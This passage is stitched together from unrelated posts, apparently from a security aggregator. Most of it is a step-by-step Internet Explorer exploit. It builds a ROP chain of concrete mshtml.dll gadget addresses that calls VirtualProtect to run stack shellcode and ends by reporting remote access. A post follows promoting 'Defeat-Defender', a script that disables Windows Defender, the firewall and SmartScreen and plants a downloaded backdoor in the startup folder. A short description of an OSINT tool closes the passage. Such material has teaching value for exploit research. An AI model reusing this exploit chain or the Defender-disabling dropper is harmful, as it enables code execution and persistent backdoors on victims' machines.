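        eip = pop();
        break;
      case "ADD_ESP_18_POP_EBP_RET":
        esp += 0x18;
        regs.ebp = pop();
        eip = pop();
        break;
      default:
        throw new Error("landed on a non-gadget slot: " + eip);
    }
  }
  return regs;
}

const regs = run(stack);
console.log(regs.eax === regs.ecx);                                             // true
console.log("0x" + (stack.indexOf("VP_IAT_PTR") * 4 - regs.ecx).toString(16)); // 0x18
console.log(regs.ebp);                                                          // PAD_EBP
```

The same model also reproduces the 0x18 distance between the saved stack address in EAX/ECX and the VirtualProtect IAT placeholder.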

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our eventual call to VirtualProtect, which will mark the stack as RWX so we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We place the function call and its arguments on the stack because we are performing this exploit on a 32-bit system, where Windows API functions such as VirtualProtect use the __stdcall calling convention, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.
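The placeholder block is laid out so that, once a `ret` pops the VirtualProtect address into EIP, the callee sees a normal __stdcall frame. This JavaScript sketch computes where each argument lands relative to ESP at function entry. It assumes the common layout in which VirtualProtect returns straight into the shellcode (the POC itself only labels that slot "Fake return address placeholder"), and the slot names are hypothetical labels for the placeholders in the block above.

```javascript
// The placeholder block in stack order (lowest address first), one DWORD per slot.
const frame = [
  "VirtualProtect", // a ret pops this into EIP
  "returnAddress",  // where VirtualProtect returns (assumed: the shellcode)
  "lpAddress",      // start of the region to re-protect
  "dwSize",         // size of that region
  "flNewProtect",   // PAGE_EXECUTE_READWRITE (0x40)
  "lpflOldProtect", // any writable address
];

// Byte offset of each slot from the first placeholder (4 bytes per slot on x86).
const offsets = Object.fromEntries(frame.map((name, i) => [name, i * 4]));

// After the ret into VirtualProtect, ESP points at "returnAddress", so the callee
// sees [esp] = return address and its __stdcall arguments at [esp+4], [esp+8], ...
function argOffsetFromEntryEsp(name) {
  return offsets[name] - offsets.returnAddress;
}

for (const name of frame.slice(2)) {
  console.log(name, "=> [esp+0x" + argOffsetFromEntryEsp(name).toString(16) + "]");
}
// lpAddress => [esp+0x4]
// dwSize => [esp+0x8]
// flNewProtect => [esp+0xc]
// lpflOldProtect => [esp+0x10]
```

Because VirtualProtect is __stdcall, it removes these 16 bytes of arguments itself when it returns, so execution continues at whatever the return-address slot holds.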

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by simply waiting until the third process is created before attaching! Each time we have executed the script, we have had a prompt asking whether we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer as you usually would. Second, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This creates a third process, which will be the last Internet Explorer process listed in WinDbg under “System order”.

Note that you do not need to use Process Hacker each time to identify the process. Open the exploit, but don’t accept the JavaScript prompt yet. Then open WinDbg and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can set some breakpoints to verify everything is intact. Let’s set a breakpoint on the gadget that “jumps” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we finally land on our 90909090 “ROP gadget”, which marks where our “meaningful” ROP chain will start, and we can see that we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX and EAX contain a value near the stack. The first parameter placeholder, an IAT entry that points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, and perform two dereference operations: first, dereference the pointer on the stack to obtain the address of the IAT entry, and then dereference the IAT entry itself to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet takes the preserved stack value in EAX and increases it by 0x18 bytes, so EAX now holds the stack address of the VirtualProtect parameter placeholder. This value is also copied into ECX using our previously used COP gadget. Next, EAX is dereferenced to obtain the value stored at that stack address (the VirtualProtect IAT entry), and the IAT entry is then dereferenced to load the actual address of VirtualProtect into EAX. Finally, because ECX still holds the stack address of the placeholder, an arbitrary write gadget overwrites the placeholder with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget that jumps over the parameter placeholders.
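To make the two dereferences concrete, here is a small JavaScript model of the gadget sequence above. Memory is simulated with a `Map`, and every address in it is hypothetical. The values were chosen only so that the placeholder sits 0x18 bytes above the saved stack value, the placeholder holds an IAT entry address, and that IAT entry holds a made-up VirtualProtect address. It is a sketch of the data flow, not something that runs against a real process.

```javascript
// Hypothetical model of the first arbitrary-write sequence. Every address
// below is made up; only the relationships between them mirror the post.
const mem = new Map();

const savedStack = 0x0a0bc000;         // value left in EAX/ECX by the chain (hypothetical)
const placeholder = savedStack + 0x18; // stack slot of the VirtualProtect placeholder
const iatSlot = 0x75170100;            // IAT entry address stored in that slot (hypothetical)
const virtualProtect = 0x76a12340;     // address the IAT entry resolves to (hypothetical)

mem.set(placeholder, iatSlot);
mem.set(iatSlot, virtualProtect);

function runFirstWrite(eaxStart) {
  let eax = (eaxStart + 0x18) >>> 0; // add eax, 0x18
  const ecx = eax;                   // mov ecx, eax (the COP gadget)
  eax = mem.get(eax);                // mov eax, dword [eax]: stack slot -> IAT entry address
  eax = mem.get(eax);                // mov eax, dword [eax]: IAT entry -> VirtualProtect
  mem.set(ecx, eax);                 // mov dword [ecx], eax: overwrite the placeholder
  return { eax, ecx };
}

const regs = runFirstWrite(savedStack);
console.log(regs.ecx.toString(16), mem.get(placeholder).toString(16)); // a0bc018 76a12340
```

The key point the model shows is that ECX is copied before the dereferences, so it still points at the placeholder when the final write happens.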

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see that the stack address is dereferenced and the result is placed in EAX, meaning EAX now holds the IAT pointer to VirtualProtect.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual address of VirtualProtect into EAX. Then, we can use an arbitrary write gadget to overwrite the value on the stack that is our “placeholder” for the VirtualProtect function.

As we can see, the stack address in ECX, which used to hold the parameter placeholder, now holds the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function is called, a return address is placed on the stack, and when the function finishes, execution is redirected to that address. We are leveraging the same concept here: right after the page in memory that holds our shellcode is marked as RWX, we want VirtualProtect to return straight into it and start executing.

Let’s first create a placeholder for our shellcode and store it in a variable called shellcode. Let’s also give our ROP chain a static size of 0x500 bytes, or 0x140 DWORDs, where each DWORD is one ROP gadget or value.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
rop += "\u9090\u9090";

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\u9191\u9191";

This creates several more addresses on the stack, which we can use to get our calculations in order. The rop variable is allotted 0x500 bytes’ worth of gadgets in total, and the loop keeps track of each DWORD that has already been placed on the stack. As more gadgets are used, the padding shrinks accordingly, so we can reliably calculate where our shellcode is on the stack without additional gadgets pushing it further and further down. The 0x16 in the for loop tracks, in hexadecimal, how many gadgets have been used so far, and every time we add a gadget we need to increase this number by the number of gadgets added. There are probably better ways to calculate this, but I am more focused on the concepts behind browser exploitation than on automation.
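The manual `0x16` bookkeeping can also be derived from the chain itself. A minimal sketch, assuming (as in this post) that every gadget or value is one DWORD written as two `\uXXXX` escapes, so one DWORD equals two UTF-16 code units in the string, and assuming `rop` holds exactly the DWORDs the counter is tracking. The helper name `padRop` is hypothetical.

```javascript
// Hypothetical helper (not from the post): pad the ROP string to a fixed
// byte budget so that whatever follows it starts at a predictable offset.
const ROP_BUDGET_BYTES = 0x500;      // same budget as the for loop in the post
const FILLER_DWORD = "\u9090\u9090"; // same filler DWORD as the post

function padRop(rop) {
  // Each DWORD is written as two \uXXXX escapes, i.e. two UTF-16 code units.
  const usedDwords = rop.length / 2;
  const totalDwords = ROP_BUDGET_BYTES / 4;
  if (!Number.isInteger(usedDwords) || usedDwords > totalDwords) {
    throw new RangeError("ROP string is not DWORD-aligned or exceeds the budget");
  }
  return rop + FILLER_DWORD.repeat(totalDwords - usedDwords);
}

// Usage: 0x16 DWORDs already in the chain, as at this point in the post.
const padded = padRop("\u4141\u4141".repeat(0x16));
console.log(padded.length / 2); // 320 (0x140 DWORDs = 0x500 bytes)
```

Because the padding is computed from `rop.length`, adding or removing a gadget no longer requires updating a counter by hand.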

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we get the stack address of the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX and use our arbitrary write gadget to overwrite the placeholder with the actual argument we would like to pass, which is the address where the 91919191 bytes start (a.k.a. our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget to also increase the variable used in our earlier for loop by 4 more ROP gadgets (for a total of 0x1a, or 26). From here on out, this number is expected to be increased to compensate for each additional gadget.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in its negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes that would break our exploit. Instead, we use the negative representation of the value, which contains no NULL bytes, and later perform a negation operation on it.

So to start, let’s place the negative representation of the distance between the current value in ECX (the stack address that points to 11111111, our parameter placeholder for the return address) and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX
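The pop/neg pair works because of 32-bit two’s complement arithmetic. The sketch below checks this for the distance given in the text (0x4dc) and for the two values used later in the chain, 0x401 (dwSize) and 0x40 (PAGE_EXECUTE_READWRITE). The function names `neg32` and `hasNullByte` are illustrative, not from the post.

```javascript
// Two's complement negation on 32-bit values, mirroring the `neg eax` gadget.
function neg32(x) {
  return (-x) >>> 0; // `>>> 0` wraps the result to an unsigned 32-bit value
}

// True if any of the four bytes of a 32-bit value is 0x00.
function hasNullByte(x) {
  for (let shift = 0; shift < 32; shift += 8) {
    if (((x >>> shift) & 0xff) === 0) return true;
  }
  return false;
}

for (const value of [0x4dc, 0x401, 0x40]) {
  const popped = neg32(value);    // what the chain stores for `pop eax`
  const restored = neg32(popped); // what `neg eax` leaves in EAX
  console.log(value.toString(16), popped.toString(16),
              hasNullByte(value), hasNullByte(popped), restored === value);
}
// 4dc fffffb24 true false true
// 401 fffffbff true false true
// 40 ffffffc0 true false true
```

Each small positive value contains NULL bytes, while its negation does not, and negating twice returns the original value.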

As mentioned above, we eventually want the stack address that points to our shellcode in EAX. To get it, we need to add the distance to our shellcode to the address of our return address placeholder, which is currently only in ECX. There is a nice ROP gadget in mshtml.dll that can easily add to EAX.

add eax, ebx ; ret

In order to add to EAX, we first need to get the distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from the previous COP gadget

Next, let’s store the distance to our shellcode in EBX and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX currently holds the address of the parameter placeholder for our return address, which was the base address used in our calculation of the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits the pop eax gadget first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add EBX, which holds the distance from the return address placeholder to our shellcode, to EAX. This leaves the stack address of the beginning of our shellcode in EAX. Then, we can reuse the arbitrary write gadget to overwrite what ECX currently points to, which is the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Using the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is the address of our shellcode!

Perfect! The next parameter, lpAddress, is also easy, as its placeholder is located 4 bytes after the return address placeholder. Since we already have a great arbitrary write gadget, we can just increase the target location by 4 bytes so that the address of the lpAddress placeholder is in ECX. Then, since the address of our shellcode is already in EAX, we can simply reuse it!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode, dwSize. We will be specifying 0x401 bytes, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above (fffffbff)
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which holds the address of the lpAddress placeholder, by 4 bytes to place the address of the dwSize placeholder in ECX. Then, we use the same arbitrary write gadget again.

Perfect! We will use the exact same routine for the flNewProtect parameter. Instead of 0x401, this time we need to end up with 0x40 in EAX, which corresponds to the memory protection constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";                     // Value from above (ffffffc0)
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory protection constant PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to do is overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE contains memory that is readable and writable, so this is where we will look for a writable address.

The end of most sections in a PE contains NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us that the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.
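The address arithmetic can be sanity-checked in a few lines. This sketch assumes mshtml.dll is loaded at 0x74c20000; that base is not stated in the post and is only inferred by subtracting the .data RVA from 7515c010. Under that assumed base, 7515c010 works out to .data+0x8010, which is still inside the 0x889c-byte section. In keeping with the NULL-byte avoidance used for the other values, it also checks that the address itself contains no 0x00 byte. The helper names are illustrative.

```javascript
// Assumption: mshtml.dll is loaded at 0x74c20000. This base is inferred from
// 7515c010 and the .data RVA in the post; it is not stated there.
const MSHTML_BASE = 0x74c20000;
const DATA_RVA = 0x534000; // .data begins at mshtml+534000
const DATA_SIZE = 0x889c;  // .data is 889C bytes in size

// Absolute address of a DWORD at `offset` inside .data, with a bounds check.
function dataAddress(offset) {
  if (offset < 0 || offset + 4 > DATA_SIZE) {
    throw new RangeError("offset is outside the .data section");
  }
  return (MSHTML_BASE + DATA_RVA + offset) >>> 0;
}

// Byte-wise check, matching the NULL-byte avoidance used for other values.
function hasNullByte(x) {
  return [0, 8, 16, 24].some((shift) => ((x >>> shift) & 0xff) === 0);
}

const target = dataAddress(0x8010);
console.log(target.toString(16), hasNullByte(target)); // 7515c010 false
```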

The routine here is identical to the previous two ROP routines, except that no negation operation is needed. We simply pop this address into EAX and use our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldProtect
rop += "\uc010\u7515";                     // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that the current value in ECX is 0x14 bytes past the VirtualProtect stack address. This means we can use 20 (0x14) dec ecx ; ret ROP gadgets to move ECX back 0x14 bytes. From there, we can move the ECX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call
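The twenty dec ecx gadgets above follow directly from the layout of the fake call frame: returning into VirtualProtect means its address is followed by a return address and then the four arguments in declaration order, VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect). A small sketch that derives the count from that layout; `FRAME_SLOTS` and `slotOffset` are illustrative names, not part of the exploit.

```javascript
// Layout of the fake VirtualProtect call on the stack, one DWORD per slot,
// starting at the slot that holds the VirtualProtect address.
const FRAME_SLOTS = [
  "VirtualProtect", // popped into EIP by the final ret
  "returnAddress",  // where VirtualProtect returns: the shellcode
  "lpAddress",
  "dwSize",
  "flNewProtect",
  "lpflOldProtect",
];

function slotOffset(name) {
  const index = FRAME_SLOTS.indexOf(name);
  if (index === -1) throw new Error(`unknown slot: ${name}`);
  return index * 4; // each slot is one 32-bit DWORD
}

// ECX finishes on lpflOldProtect; each `dec ecx` moves it back by one byte.
const decCount = slotOffset("lpflOldProtect") - slotOffset("VirtualProtect");
console.log(decCount, "0x" + decCount.toString(16)); // 20 0x14
```

The same layout explains the four inc ecx gadgets used between each argument write: adjacent slots are exactly one DWORD apart.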

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\uCCCC\uCCCC";

After ECX is decremented, we can see that it now contains the VirtualProtect stack address. This value is then passed to EAX, which is exchanged with ESP so that ESP points at our fake VirtualProtect call. Then, the ret part of the gadget takes the value at ESP, which is VirtualProtect, loads it into EIP, and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!


I know this was a very long-winded blog post. It has been a bit disheartening to see a lack of beginning-to-end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to help those who want to get into it but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Defeat-Defender - Powerful Batch Script To Dismantle Complete Windows Defender Protection And Even Bypass Tamper Protection

15 April 2021 at 21:30
By: Zion3R

Powerful batch file to disable Windows Defender, Firewall, and SmartScreen, and execute the payload

Usage :
  1. Edit Defeat-Defender.bat on this line and replace the direct url of your payload
  2. Run the script "run.vbs". It will ask for admin permission. If permission is granted, the script will work silently without console windows.

After it gets admin permission, it will disable Defender:
  1. PUAProtection
  2. Automatic Sample Submission
  3. Windows FireWall
  4. Windows Smart Screen(Permanently)
  5. Disable Quickscan
  6. Add exe file to exclusions in defender settings
  7. Disable Ransomware Protection

Virus Total Result :

Bypassing Windows-Defender Techniques :

Recently, Windows introduced a new feature called "Tamper Protection", which prevents disabling real-time protection and modifying Defender registry keys using PowerShell or cmd. If you need to disable real-time protection, you have to do it manually. But we will disable real-time protection using NSudo without triggering Windows Defender.

After Running Defeat-Defender Script

Tested on Windows Version 20H2

Behind The Scenes :

When the batch file is executed, it asks for admin permissions. After getting admin privileges, it disables Windows Defender real-time protection, the firewall, and SmartScreen, then downloads our backdoor from the server and places it in the startup folder. The backdoor is executed once it has been downloaded and will be started whenever the system starts.


Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc...

6 April 2021 at 12:30
By: Zion3R

Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In addition, Scylla has Shodan support, so you can search for devices all over the internet, and it has in-depth geolocation capabilities. Lastly, Scylla has a finance section which allows users to check if a credit/debit card number has been leaked/pasted in a breach and returns information on the card's IIN/BIN. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Scylla.


1: git clone
2: cd Scylla
3: sudo python3 -m pip install -r requirments.txt
4: python3 --help

  1. python3 --instagram davesmith --twitter davesmith
